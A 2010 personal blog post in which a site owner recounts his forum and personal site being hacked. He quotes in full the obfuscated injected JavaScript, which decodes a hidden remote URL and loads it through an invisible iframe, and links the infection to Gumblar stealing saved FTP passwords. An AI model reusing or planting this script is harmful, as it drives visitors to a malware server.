Search This Blog

Saturday, 21 August 2010

My websites been hacked !

I run a forum www.bvra.org.uk and a personal site www.paulregan.co.uk.

Last night someone posted on the forum that Google had flagged the site as dangerous and a follow post that Kaspersky was reporting a trojan - Trojan.JS.Iframe.nk

What !, my forum, no way .. I tried a few things and my AV (Mcafee) didnt complain.  Odd, check the date time on the files and low and behold the index.* (htm, html, php) files had been changed 2 days ago .. not by me.


<body><script>
var I={j:{I:{I:'~',l:'.',j:'^'},l:{I:'%',l:218915,j:1154%256},j:{I:1^0,l:55,j:'ijl'}},I:{I:{I:function(j){try{var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x6e\x70\x75\x74');l['\x74\x79\x70\x65']='\x68\x69\x64\x64\x65\x6e';l['\x76\x61\x6c\x75\x65']=j;l['\x69\x64']='\x6a';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);}catch(j){return false;}
return true;},l:function(){try{var l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6a');}catch(l){return false;}
return l.value;},j:function(){var l=I.I.I.I(I.l.I.I('.75.67.67.63.3a.2f.2f.31.31.33.2e.31.31.2e.31.39.34.2e.31.37.37.2f.75.67.71.62.70.66.2f.74.6e.67.72.2e.63.75.63.3f.66.75.61.6e.7a.72.3d.67.72.7a.63.79.6e.67.72.66.61.72.6a.66'));var j=(l)?I.I.I.l():false;return j;}},l:{I:function(){var l=I.I.I.j('trashtext');var j=(l)?l:'trashtext';return j||false;},l:function(){var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x6c');l['\x77\x69\x64\x74\x68']='0.1em';l['\x68\x65\x69\x67\x68\x74']='0.2em';l['\x73\x74\x79\x6c\x65']['\x62\x6f\x72\x64\x65\x72']='none';l['\x73\x74\x79\x6c\x65']['\x64\x69\x73\x70\x6c\x61\x79']='none';l['\x69\x6e\x6e\x65\x72\x48\x54\x4d\x4c']='\x6c';l['\x69\x64']='\x6c';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);},j:function(){var l=I.I.j.j(I.I.l.l());l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6c');var j=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x66\x72\x61\x6d\x65');j['\x68\x65\x69\x67\x68\x74']=j['\x77\x69\x64\x74\x68'];j['\x73\x72\x63']=I.I.j.I(I.I.l.I());try{l['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](j);}catch(j){}}},j:{I:function(l){return l['replace'](/[A-Za-z]/g,function(j){return String['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65']((((j=j.charCodeAt(0))&223)-52)%26+(j&32)+65);});},l:function(l){return I.I.j.I(l)['\x74\x6f\x53\x74\x72\x69\x6e\x67']()||false;},j:function(l){try{l();}catch(l){}}}},l:{I:{I:function(l){l=l['replace'](/[.]/g,'%');return window['\x75\x6e\x65\x73\x63\x61\x70\x65'](l);},l:'21',j:'16'},l:{I:'50',l:'85',j:'81'},j:{I:'55',l:'85',j:'57'}}}
I.I.l.j();</script>





Had been added to both the forum and my personal site index files.  A strange file templatesnews.php had also been uploaded at the same time.

Anyone know what that code does ? ..

Cleaned the files up and locked FTP, even though I had a stupidly complex password.

I've emailed the hosting company, as I suspected something wider.  They got back to me and told me mine where the only sites - look for Gumblar.

Now last weekend my home PC started to act up, Firefox and Chrome would both crash, actually come to think of it the two sites I always rely on for testing are mine.  That explains it ! .. A quick google and it appears Grumblar can get saved password from CoreFTP which I use, it then inserts code to spread itself.  

Bugger, and I work in IT ! .. My machine runs upto date AV, Spyware, Firewall & Windows updates. How the hell did this get in ..

Props to virtualnames.co.uk who quickly restored my site from backups and I've since disabled FTP and changed the passwords again.


Now to make sure this b'stard thing has'nt infected my since rebuilt OS.